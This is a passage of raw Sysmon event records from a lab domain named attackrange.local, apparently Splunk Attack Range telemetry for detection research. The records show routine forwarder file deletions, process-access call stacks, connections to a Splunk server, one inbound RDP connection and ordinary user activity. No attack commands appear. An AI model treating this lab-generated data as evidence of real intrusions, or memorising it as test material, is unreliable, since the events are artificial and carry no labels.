Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89ACE3485A76B4BD2101FDCA2FC8056D,SHA256=6448B2E6C2C5B9299D2C61D3AFAE284E6C437F409FBA35097400076AFFE6ED3D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807305Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:51.243{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57245-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001048098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.305{466BC892-35E4-60E8-4B0C-00000000CF01}7336ATTACKRANGE\bobC:\Program Files\Notepad++\notepad++.exeC:\Users\bob\AppData\Roaming\Notepad++\backup\AttackRangeSysmon.xml@2021-07-12_074929MD5=90E0C805D0CFABCDC0FB02A894E9440E,SHA256=F3C5D8DEC54AC9C9C629B95FDA28E4554D0E20AE56621E794AF94B8F0281D9CB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:53.172{466BC892-F45C-60EB-207D-00000000CF01}52841020C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807307Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:54.538{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=811A213CA891E2F2D63B86363D51824D,SHA256=BCEE66A0984DCCB6EC55BD59E09D8672B9A42C5E1D594EB72D21DF31D7AD5E88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.590{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A344714CCA3CCF51F03AABC57BB5F8D1,SHA256=0D7E989F2338BAA2FC7F0C517A27010784A5AE775AC79DA007DBACFB914EFE69,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.305{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45E-60EB-227D-00000000CF01}9556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.289{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048115Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.289{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048114Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.289{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048113Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.289{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048112Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.289{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F45E-60EB-227D-00000000CF01}9556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001048111Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.289{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F45E-60EB-227D-00000000CF01}9556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001048110Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:54.290{466BC892-F45E-60EB-227D-00000000CF01}9556C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000807308Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:55.538{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B43020D2DA4DC2B317EF6C9B1DE019EC,SHA256=85C307357E5AC0D46C358CB1B912F495AB33885D4060BDAD05317FB9329F479B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:55.605{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF394AAD20857323DF5F9F3D12153949,SHA256=856E5D1905E63CF154A1DF4CDE559AF6F632DB4F33ED44FD58BBF75C5D2746E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:55.290{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2CC19D4BF6872ABB6CFEED31DF3F979B,SHA256=8811AA3DB72A43656B69D69271A662887F90FA16375745F3518510DAAB448729,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807309Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:56.553{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93C97B947A34C0645E659EC461DE549A,SHA256=6E40CEFBC3FE03282AB8A607A5A3722B76B71A1099CB68FC74EE13FB340459F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:56.935{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:56.670{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F25C8604560C85EBDEA714EB1C930CD8,SHA256=2C29D20DA2F92BD351F1FFF092F2E44931722D5549757FEA983BDA3C0C82A922,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:56.620{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC44A32093F66B59E695A0D40ECB022,SHA256=313DFB536E0980DCEFCAAFCEA9005A38F015280D4C0288192D6C81D3C7705AE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:57.635{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8B1CA52C8D1E0F5083D2CB45BC39BBA,SHA256=1D0B8101FEFC252BF2418116D2BE269ED4736A3C752FE488F52E1FD6C1B550E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807310Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:57.585{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECFE6FB624C2ED6DE8BF4CFEF4E89F72,SHA256=064E7312CD08CFF1C7848F57EE44A51E27DECC2BB5DE17A3EC4C368563C6504F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:48.893{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-5553-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x8000000000000000807311Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:58.617{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9EBF76CF594F915FDA549F232B1C5BE,SHA256=21A4055CDB48FC3F922444DEE9738BED7BED138DC9D6848B0A6D839567515918,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.465{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51006-false10.0.1.12-8089- 23542300x80000000000000001048128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:58.639{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E34044CBC883F2E12F1F354BE79DE0E7,SHA256=DFFE800953CF63002DC7D2C5162C22FDE9AC8F21334B6B7897F9739FE57DE822,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:58.121{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf681cdf.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:49.712{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51005-false10.0.1.12-8000- 23542300x8000000000000000807313Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:59.633{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A1FF0132671D1B13E375E8CA82667D2,SHA256=78A8C529F0FFEBDE78EFB3F39314FE0E16E137B72D000550BABBED17E7870C0E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:59.654{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC0BC4530CC3C3DEB33D4612493ECE66,SHA256=3BC33F85ABE8997559DBFE62A9E3EEFEDC502ACF24B61C102A0A646C90303C8F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807312Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:57.248{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57246-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807314Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:00.664{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCD7BE00DD91337A8F634E5E24D14A1D,SHA256=255F3E7DE7B07486C88BC4EF79390926AB7E8806C1F97176F91A4923D6BCD1A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048138Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.654{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2439AED9AA01EB90EFE92467CC5C6E8,SHA256=1B73A68E2B71931E288D99F4525B79EEBEA29B29046F84D1BAC1D33B84056306,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048137Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.639{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001048136Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.639{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001048135Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.639{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001048134Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.639{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001048133Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.639{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf6826b2.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048132Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:00.607{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\aborted-session-pingMD5=4EDC4025C912403937AF6029354FA73C,SHA256=46C67485491A2F668848C8ED3A4B31C4ACE26D2CE0DE9EE9E34B87B12528E733,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 